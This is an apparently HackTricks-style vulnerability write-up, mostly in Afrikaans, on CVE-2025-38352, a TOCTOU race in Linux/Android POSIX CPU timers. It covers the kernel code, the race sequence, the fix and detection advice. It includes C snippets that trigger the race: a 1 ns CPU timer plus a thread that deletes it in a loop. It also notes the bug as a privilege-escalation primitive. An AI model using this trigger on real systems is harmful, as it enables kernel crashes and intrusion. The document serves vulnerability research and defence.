POSIX CPU Timers TOCTOU wedloop (CVE-2025-38352)

Reading time: 8 minutes

Hierdie bladsy dokumenteer 'n TOCTOU-wedlooptoestand in Linux/Android POSIX CPU timers wat timer state kan korrupteer en die kernel kan laat crash, en onder sekere omstandighede na privilege escalation gelei kan word.

• Geaffekteerde komponent: kernel/time/posix-cpu-timers.c
• Primitive: expiry vs deletion race under task exit
• Konfigurasie-sensitief: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)

Vinnige interne samevatting (relevant vir exploitation)

• Drie CPU-klokke bestuur accounting vir timers via cpu_clock_sample():
• CPUCLOCK_PROF: utime + stime
• CPUCLOCK_VIRT: utime only
• CPUCLOCK_SCHED: task_sched_runtime()
• Die skep van 'n timer verbind die timer aan 'n taak/pid en initialiseer die timerqueue nodes:

static int posix_cpu_timer_create(struct k_itimer *new_timer) {
struct pid *pid;
rcu_read_lock();
pid = pid_for_clock(new_timer->it_clock, false);
if (!pid) { rcu_read_unlock(); return -EINVAL; }
new_timer->kclock = &clock_posix_cpu;
timerqueue_init(&new_timer->it.cpu.node);
new_timer->it.cpu.pid = get_pid(pid);
rcu_read_unlock();
return 0;
}

• Arming voeg items in 'n per-base timerqueue in en kan die next-expiry cache bywerk:

static void arm_timer(struct k_itimer *timer, struct task_struct *p) {
struct posix_cputimer_base *base = timer_base(timer, p);
struct cpu_timer *ctmr = &timer->it.cpu;
u64 newexp = cpu_timer_getexpires(ctmr);
if (!cpu_timer_enqueue(&base->tqhead, ctmr)) return;
if (newexp < base->nextevt) base->nextevt = newexp;
}

• Fast path vermy duur verwerking tensy gecachede vervaltye aandui dat 'n afvuur moontlik is:

static inline bool fastpath_timer_check(struct task_struct *tsk) {
struct posix_cputimers *pct = &tsk->posix_cputimers;
if (!expiry_cache_is_inactive(pct)) {
u64 samples[CPUCLOCK_MAX];
task_sample_cputime(tsk, samples);
if (task_cputimers_expired(samples, pct))
return true;
}
return false;
}

• Verstryking versamel vervalde timers, merk hulle as afgevuur, verwyder hulle uit die wagry; werklike lewering word uitgestel:

#define MAX_COLLECTED 20
static u64 collect_timerqueue(struct timerqueue_head *head,
struct list_head *firing, u64 now) {
struct timerqueue_node *next; int i = 0;
while ((next = timerqueue_getnext(head))) {
struct cpu_timer *ctmr = container_of(next, struct cpu_timer, node);
u64 expires = cpu_timer_getexpires(ctmr);
if (++i == MAX_COLLECTED || now < expires) return expires;
ctmr->firing = 1;                           // critical state
rcu_assign_pointer(ctmr->handling, current);
cpu_timer_dequeue(ctmr);
list_add_tail(&ctmr->elist, firing);
}
return U64_MAX;
}

Twee vervalverwerkingsmodusse

• CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: verval word uitgestel via task_work op die teiken-taak
• CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: verval word direk in die IRQ-konteks hanteer

void run_posix_cpu_timers(void) {
struct task_struct *tsk = current;
__run_posix_cpu_timers(tsk);
}
#ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK
static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
if (WARN_ON_ONCE(tsk->posix_cputimers_work.scheduled)) return;
tsk->posix_cputimers_work.scheduled = true;
task_work_add(tsk, &tsk->posix_cputimers_work.work, TWA_RESUME);
}
#else
static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
lockdep_posixtimer_enter();
handle_posix_cpu_timers(tsk);                  // IRQ-context path
lockdep_posixtimer_exit();
}
#endif

In die IRQ-context path word die firing list buite sighand verwerk.

static void handle_posix_cpu_timers(struct task_struct *tsk) {
struct k_itimer *timer, *next; unsigned long flags, start;
LIST_HEAD(firing);
if (!lock_task_sighand(tsk, &flags)) return;   // may fail on exit
do {
start = READ_ONCE(jiffies); barrier();
check_thread_timers(tsk, &firing);
check_process_timers(tsk, &firing);
} while (!posix_cpu_timers_enable_work(tsk, start));
unlock_task_sighand(tsk, &flags);              // race window opens here
list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
int cpu_firing;
spin_lock(&timer->it_lock);
list_del_init(&timer->it.cpu.elist);
cpu_firing = timer->it.cpu.firing;         // read then reset
timer->it.cpu.firing = 0;
if (likely(cpu_firing >= 0)) cpu_timer_fire(timer);
rcu_assign_pointer(timer->it.cpu.handling, NULL);
spin_unlock(&timer->it_lock);
}
}

Primêre oorsaak: TOCTOU tussen IRQ-tyd verstryking en gelyktydige verwydering tydens taak-afsluiting Voorvereistes

• CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ-pad in gebruik)
• Die teiken-taak gaan verlaat maar is nog nie volledig opgeraap nie
• 'n Ander draad roep terselfdertyd posix_cpu_timer_del() vir dieselfde timer aan

Volgorde

1. update_process_times() aktiveer run_posix_cpu_timers() in IRQ-konteks vir die uitgaande taak.
2. collect_timerqueue() stel ctmr->firing = 1 en skuif die timer na die tydelike firing-lys.
3. handle_posix_cpu_timers() laat die sighand los via unlock_task_sighand() om timers buite die lock af te lewer.
4. Onmiddellik na unlock kan die uitgaande taak opgeraap word; 'n sibligdraad voer posix_cpu_timer_del() uit.
5. In hierdie venster kan posix_cpu_timer_del() misluk om state te bekom via cpu_timer_task_rcu()/lock_task_sighand() en sodoende die normale in-flight guard wat timer->it.cpu.firing kontroleer, oorslaan. Verwydering gaan voort asof dit nie firing is nie, korrupteer state terwyl verstryking hanteer word, wat tot crashes/UB lei.

Waarom TASK_WORK-modus per ontwerp veilig is

• Met CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y word verstryking uitgestel na task_work; exit_task_work hardloop voor exit_notify, dus die IRQ-tyd oorkruising met reaping gebeur nie.
• Selfs dan, as die taak reeds besig is om te verlaat, misluk task_work_add(); gating op exit_state maak beide modusse konsekwent.

Oplossing (Android common kernel) en motivering

• Voeg 'n vroeë terugkeer by as die huidige taak besig is om te verlaat, wat alle verwerking afskerm:

// kernel/time/posix-cpu-timers.c (Android common kernel commit 157f357d50b5038e5eaad0b2b438f923ac40afeb)
if (tsk->exit_state)
return;

• Dit verhoed dat handle_posix_cpu_timers() vir uitgaande take betree word, en verwyder daarmee die venster waar posix_cpu_timer_del() it.cpu.firing kan mis en met expiry-verwerking kan meeding.

Impak

• Kerngeheuebeskadiging van timerstrukture tydens gelyktydige expiry/verwydering kan onmiddellike ineenstortings (DoS) veroorsaak en is 'n sterk primiti ef vir privilege escalation weens geleenthede om arbitrêre kernel-state te manipuleer.

Die fout in werking stel (veilige, reproduseerbare toestande) Build/config

• Maak seker dat CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n gestel is en gebruik 'n kernel sonder die exit_state gating-fix.

Runtime-strategie

• Rig op 'n thread wat op die punt staan om te verlaat en heg 'n CPU-timer daaraan (per-thread of process-wide clock):
• For per-thread: timer_create(CLOCK_THREAD_CPUTIME_ID, ...)
• For process-wide: timer_create(CLOCK_PROCESS_CPUTIME_ID, ...)
• Wapen dit met 'n baie kort aanvanklike verval en 'n klein interval om IRQ-path entries te maksimeer:

static timer_t t;
static void setup_cpu_timer(void) {
struct sigevent sev = {0};
sev.sigev_notify = SIGEV_SIGNAL;    // delivery type not critical for the race
sev.sigev_signo = SIGUSR1;
if (timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &t)) perror("timer_create");
struct itimerspec its = {0};
its.it_value.tv_nsec = 1;           // fire ASAP
its.it_interval.tv_nsec = 1;        // re-fire
if (timer_settime(t, 0, &its, NULL)) perror("timer_settime");
}

• Vanaf 'n sibling thread, verwyder gelyktydig dieselfde timer terwyl die target thread uitstap:

void *deleter(void *arg) {
for (;;) (void)timer_delete(t);     // hammer delete in a loop
}

• Wedloopversterkers: hoë scheduler-tikfrekwensie, CPU-lading, herhaalde thread exit/re-create-siklusse. Die crash manifesteer gewoonlik wanneer posix_cpu_timer_del() versuim om firing op te merk weens mislukte taak-opsoek/sloting net ná unlock_task_sighand().

Detection and hardening

• Mitigering: pas die exit_state guard toe; verkies om CONFIG_POSIX_CPU_TIMERS_TASK_WORK te aktiveer waar moontlik.
• Waarneembaarheid: voeg tracepoints/WARN_ONCE by unlock_task_sighand()/posix_cpu_timer_del(); verwittig wanneer it.cpu.firing==1 waargeneem word tesame met mislukte cpu_timer_task_rcu()/lock_task_sighand(); hou dop vir timerqueue-ongereenhede rondom taakuitgang.

Audit hotspots (for reviewers)

• update_process_times() → run_posix_cpu_timers() (IRQ)
• __run_posix_cpu_timers() selection (TASK_WORK vs IRQ path)
• collect_timerqueue(): sets ctmr->firing and moves nodes
• handle_posix_cpu_timers(): verwyder sighand voor die firing-lus
• posix_cpu_timer_del(): vertrou op it.cpu.firing om in-vlug expiry te detecteer; hierdie kontrole word oorgeslaan wanneer taak-opsoek/lock misluk tydens exit/reap

Notes for exploitation research

• Die bekendgemaakte gedrag is 'n betroubare kernel crash primitive; om dit in privilege escalation te omskep benodig gewoonlik 'n bykomende beheerbare oorlapping (object lifetime of write-what-where-invloed) wat buite die bestek van hierdie opsomming val. Behandel enige PoC as potensieel destabiliserend en hardloop dit slegs in emulators/VMs.

Verwysings

• Race Against Time in the Kernel’s Clockwork (StreyPaws)
• Android security bulletin – September 2025
• Android common kernel patch commit 157f357d50b5…